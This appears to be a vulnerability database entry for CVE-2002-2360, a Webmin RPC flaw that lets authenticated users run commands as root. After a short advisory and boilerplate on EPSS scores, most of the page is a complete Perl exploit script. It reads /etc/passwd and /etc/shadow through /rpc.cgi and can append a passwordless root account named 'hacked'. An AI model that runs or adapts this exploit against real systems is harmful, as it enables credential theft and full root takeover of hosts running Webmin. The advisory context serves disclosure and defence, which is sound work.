CVE-2002-2360 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/5591/info In cases where users of Webmin do not have root access on the underlying host, it may be possible to mount privilege escalation attacks on the underlying host. This normally occurs in configurations where multiple Webmin client systems have access to a centralized Webmin server. Webmin allows commands to be executed remotely on the underlying host from other Webmin client systems via the RPC module. However, the script that provides this facility does not sufficiently check the permissions of the source of the remote commands. As a result, it is possible for remote authenticated Webmin users to abuse this facility to execute commands (as root) on the underlying host. This may be exploited to gain root access to a system hosting the vulnerable software. #!/usr/bin/perl # urlize # Convert a string to a form ok for putting in a URL sub urlize { local $rv = $_[0]; $rv =~ s/([^A-Za-z0-9])/sprintf("%%%2.2X", ord($1))/ge; return $rv; } # un_urlize(string) # Converts a URL-encoded string to the original sub un_urlize { local $rv = $_[0]; $rv =~ s/\+/ /g; $rv =~ s/%(..)/pack("c",hex($1))/ge; return $rv; } # serialise_variable(variable) # Converts some variable (maybe a scalar, hash ref, array ref or scalar ref) # into a url-encoded string sub serialise_variable { if (!defined($_[0])) { return 'UNDEF'; } local $r = ref($_[0]); local $rv; if (!$r) { $rv = &urlize($_[0]); } elsif ($r eq 'SCALAR') { $rv = &urlize(${$_[0]}); } elsif ($r eq 'ARRAY') { $rv = join(",", map { &urlize(&serialise_variable($_)) } @{$_[0]}); } elsif ($r eq 'HASH') { $rv = join(",", map { &urlize(&serialise_variable($_)).",". &urlize(&serialise_variable($_[0]->{$_})) } keys %{$_[0]}); } elsif ($r eq 'REF') { $rv = &serialise_variable(${$_[0]}); } return ($r ? $r : 'VAL').",".$rv; } # unserialise_variable(string) # Converts a string created by serialise_variable() back into the original # scalar, hash ref, array ref or scalar ref. sub unserialise_variable { local @v = split(/,/, $_[0]); local ($rv, $i); if ($v[0] eq 'VAL') { $rv = &un_urlize($v[1]); } elsif ($v[0] eq 'SCALAR') { local $r = &un_urlize($v[1]); $rv = \$r; } elsif ($v[0] eq 'ARRAY') { $rv = [ ]; for($i=1; $i<@v; $i++) { push(@$rv, &unserialise_variable(&un_urlize($v[$i]))); } } elsif ($v[0] eq 'HASH') { $rv = { }; for($i=1; $i<@v; $i+=2) { $rv->{&unserialise_variable(&un_urlize($v[$i]))} = &unserialise_variable(&un_urlize($v[$i+1])); } } elsif ($v[0] eq 'REF') { local $r = &unserialise_variable($v[1]); $rv = \$r; } elsif ($v[0] eq 'UNDEF') { $rv = undef; } return $rv; } # encode_base64(string) # Encodes a string into base64 format sub encode_base64 { local $res; pos($_[0]) = 0; # ensure start at the beginning while ($_[0] =~ /(.{1,45})/gs) { $res .= substr(pack('u', $1), 1)."\n"; chop($res); } $res =~ tr|\` -_|AA-Za-z0-9+/|; local $padding = (3 - length($_[0]) % 3) % 3; $res =~ s/.{$padding}$/'=' x $padding/e if ($padding); return $res; } use Socket; if ($#ARGV<6) {die "Usage: exploit.pl proxyIP proxyPort remoteIP remotePort username password command_interface command interface should equal one of these: 1 - read file /etc/passwd 2 - read file /etc/shadow 3 - insert into file /etc/passwd (\"hacked:x:0:0:root:/root:/bin/bash\") 4 - insert into file /etc/shadow (\"hacked::0:99999:7:-1:-1:134538548\") ";} $username = $ARGV[4]; $password = $ARGV[5]; $proxyPort = $ARGV[1]; $proxyIP = $ARGV[0]; $remoteIP = $ARGV[2]; $remotePort = $ARGV[3]; $command_interface = $ARGV[6]; $target = inet_aton($proxyIP); $paddr = sockaddr_in($proxyPort, $target); print "Connecting to: $proxyIP:$proxyPort, with the following user: $username and password: $password. Hacking server: $remoteIP:$remotePort\n"; $auth = &encode_base64("$username:$password"); $auth =~ s/\n//g; if (($command_interface eq 1) || ($command_interface eq 3)) { $d = { 'action' => 'read', 'file' => "/etc/passwd", 'session' => "0"}; } if (($command_interface eq 2) || ($command_interface eq 4)) { $d = { 'action' => 'read', 'file' => "/etc/shadow", 'session' => "0"}; } $tostr = &serialise_variable($d); $lengthstr = length($tostr); $request = "POST /rpc.cgi HTTP/1.1 Host: $remoteIP:$remotePort User-agent: Webmin Authorization: basic $auth Content-Length: $lengthstr $tostr"; print "Sending:\n---\n$request\n---\n"; $proto = getprotobyname('tcp'); socket(S, PF_INET, SOCK_STREAM, $proto) || die("Socket problems\n"); connect(S, $paddr) || die "connect: $!"; select(S); $|=1; # print $pstr; print $request; $found = 0; while(<S>) { if (($found == 1) || (/^\r\n/)) { if ($found == 0) { $found = 1; } else { $in = join ("", $in, $_); } } } select(STDOUT); print "Raw:\n---\n$in\n---\n"; print "Unserialized:\n---\n", unserialise_variable($in)->{'rv'}, "\n---\n"; close(S); if ($command_interface eq 3) { $d = { 'action' => 'write', 'data'=>join("", unserialise_variable($in)->{'rv'}, "hacked:x:0:0:root:/root:/bin/bash\n"), 'file' => "/etc/passwd", 'session' => "0"}; } if ($command_interface eq 4) { $d = { 'action' => 'write', 'data'=>join("", unserialise_variable($in)->{'rv'}, "hacked::0:99999:7:-1:-1:134538548\n"), 'file' => "/etc/shadow", 'session' => "0"}; } $tostr = &serialise_variable($d); $lengthstr = length($tostr); $request = "POST /rpc.cgi HTTP/1.1 Host: $remoteIP:$remotePort User-agent: Webmin Authorization: basic $auth Content-Length: $lengthstr $tostr"; print "Sending:\n---\n$request\n---\n"; $proto = getprotobyname('tcp'); socket(S, PF_INET, SOCK_STREAM, $proto) || die("Socket problems\n"); connect(S, $paddr) || die "connect: $!"; select(S); $|=1; # print $pstr; print $request; $found = 0; while(<S>) { if (($found == 1) || (/^\r\n/)) { if ($found == 0) { $found = 1; } else { $in = join ("", $in, $_); } } } select(STDOUT); print "Raw:\n---\n$in\n---\n"; print "Unserialized:\n---\n", unserialise_variable($in)->{'rv'}, "\n---\n"; close(S); # --- EOF ---